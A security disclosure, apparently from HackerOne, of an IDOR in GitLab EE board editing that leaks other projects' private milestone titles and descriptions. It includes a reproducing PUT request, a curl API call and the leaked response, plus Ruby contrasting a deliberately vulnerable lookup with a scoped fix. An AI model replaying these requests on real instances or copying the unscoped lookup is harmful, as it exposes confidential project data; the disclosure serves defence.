Board milestone assignment in GitLab EE exposes all milestone titles and descriptions

An insecure direct object reference (IDOR) vulnerability was reported by Jobert via HackerOne. Details as follows:

There's an IDOR vulnerability in the Projects::BoardsController that allows a user to assign their board to any milestone on the GitLab instance. By then fetching the board object through the API, the milestone title, description, due date, state, and project ID are revealed. To reproduce, start off by creating an account on a GitLab EE instance. Create a project and go to the board. Click the "Edit board" button and intercept your network traffic. When you click on the "Save changes" button, observe the following request being submitted:

Request

PUT /root/test/boards/1.json HTTP/1.1
Host: gitlab-instance
...

{
  "board": {
    "id": 1,
    "name": "Development",
    "labels": [

    ],
    "milestone_id": -1,
    "assignee_id": 2,
    "weight": null,
    "label_ids": [
      ""
    ]
  }
}

In this request, use any milestone_id of any other project. Then, create a personal API token for your own account and request the board through the API to expose the milestone information:

Command

$ curl -vv -H 'private-token: AAA' http://gitlab-instance/api/v4/projects/1/boards | jq

Response

[
  {
    "id": 1,
    "name": "Development",
    ...
    "milestone": {
      "id": 1,
      "iid": 2,
      "project_id": 2,
      "title": "Private milestone",
      "description": "Secret description",
      "state": "active",
      "created_at": "0000-00-00T09:19:48.843Z",
      "updated_at": "0000-00-00T09:19:48.843Z",
      "due_date": null,
      "start_date": null
    },
    ...
]

This vulnerability is tested on the latest version and can only be exploited on GitLab EE.

Impact

The milestones may contain confidential information that may be interesting to attackers.
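The root cause described in the report is a milestone id taken from the request and resolved against every milestone on the instance, with no check that the board's project is allowed to use it. The following Ruby is an added illustration, not GitLab's code and not the patch GitLab shipped: it models that lookup in a few lines (hypothetical Milestone, Project and Board structs over constructed sample data) beside the scoped lookup that closes the hole, and a serializer that reproduces the fields the report shows leaking through the boards API. The -1 sentinel for "no milestone" is taken from the request body above; the assumption that a board may only use milestones of its own project is a simplification (real GitLab boards can also use group milestones).

```ruby
# Added example, not GitLab code. Models the IDOR in the report and the
# scoped lookup that prevents it. All class and method names are hypothetical.

Milestone = Struct.new(:id, :project_id, :title, :description)
Board     = Struct.new(:id, :project_id, :milestone_id)

# Constructed sample data: milestone 1 belongs to project 2 (someone else's),
# milestone 5 belongs to project 1 (the attacker's own project), as in the report.
MILESTONES = [
  Milestone.new(1, 2, "Private milestone", "Secret description"),
  Milestone.new(5, 1, "Own milestone", "Nothing secret here"),
].freeze

# Vulnerable pattern: the id from the request body is stored without checking
# which project the milestone belongs to. Any milestone on the instance works.
def update_board_vulnerable(board, params)
  board.milestone_id = params[:milestone_id]&.to_i
  board
end

class ForbiddenMilestone < StandardError; end

# Hardened pattern: resolve the id only among milestones the board's project may
# use. An id from another project is treated as if it did not exist.
def update_board_scoped(board, params)
  mid = params[:milestone_id]&.to_i
  if mid.nil? || mid == -1          # -1 is the "no milestone" sentinel in the report's request
    board.milestone_id = nil
    return board
  end
  allowed = MILESTONES.find { |m| m.id == mid && m.project_id == board.project_id }
  unless allowed
    raise ForbiddenMilestone, "milestone #{mid} is not available to project #{board.project_id}"
  end
  board.milestone_id = allowed.id
  board
end

# Serializer mirroring the fields the report shows being exposed by
# GET /api/v4/projects/:id/boards. The leak happens here only because the
# update step accepted a foreign milestone id.
def serialize_board(board)
  m = MILESTONES.find { |x| x.id == board.milestone_id }
  {
    "id" => board.id,
    "milestone" => m && {
      "id" => m.id, "project_id" => m.project_id,
      "title" => m.title, "description" => m.description,
    },
  }
end

if __FILE__ == $PROGRAM_NAME
  board = Board.new(1, 1, nil)
  update_board_vulnerable(board, { milestone_id: 1 })
  puts "vulnerable: #{serialize_board(board)["milestone"].inspect}"
  begin
    update_board_scoped(Board.new(1, 1, nil), { milestone_id: 1 })
  rescue ForbiddenMilestone => e
    puts "scoped: rejected (#{e.message})"
  end
end
```

The scoped version also fails closed for unknown or non-numeric ids, since `find` returns nil for them; the detection-side counterpart is a board update whose stored milestone has a project_id different from the board's own, which a one-off query over existing boards can surface after upgrading.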
